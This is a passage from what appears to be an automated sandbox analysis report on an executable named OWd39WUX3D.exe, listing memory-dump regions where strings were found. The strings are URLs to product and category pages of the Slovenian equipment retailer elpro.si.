00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/el-pro-set4/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/o320-3003-180-500-m-temperaturno-tipalo-termoelement-tc-oplascen-s-prik
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/sl-2001-validacijski-set-ebro/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/v400-7022-temperaturno-tipalo-uporovno-rtd-vticno-s-prikljucnim-kablom-
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/analizato
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/aplikacij
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/kamere-en
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/merilnik-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/potrosni-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/arhiv/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/datalog
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/dodatna
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/lastnov
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/merilni
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/monitor
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, 